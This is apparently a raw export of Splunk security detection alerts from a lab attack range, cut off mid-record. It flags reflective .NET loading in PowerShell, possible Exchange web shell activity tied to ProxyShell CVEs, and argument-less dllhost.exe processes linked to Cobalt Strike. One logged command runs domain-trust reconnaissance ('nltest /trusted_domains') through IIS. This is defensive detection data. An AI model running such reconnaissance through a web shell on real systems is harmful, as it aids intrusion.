Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T11:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T11:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664888132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T11:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T11:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664888132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T11:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T11:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664887432, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="1", dest="exchange01.attackrange.local", firstTime="2022-10-04T10:54:20", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:54:20", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664887432, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="1", dest="exchange01.attackrange.local", firstTime="2022-10-04T10:54:20", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:54:20", original_file_name="Cmd.Exe", parent_process="c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipmb991e788-0137-49d8-bf80-6e84f2791064 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config\" -w \"\" -m 0", process="\"cmd.exe\" /c nltest /trusted_domains", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="SYSTEM" 1664887432, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="1", dest="exchange01.attackrange.local", firstTime="2022-10-04T10:54:20", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:54:20", original_file_name="unknown", parent_process="C:\\Windows\\System32\\inetsrv\\w3wp.exe", process="C:\\Windows\\System32\\cmd.exe /c nltest /trusted_domains", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="EXCHANGE01$" 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="7124", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6348", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6004", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="24304", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="12432", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="11804", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], 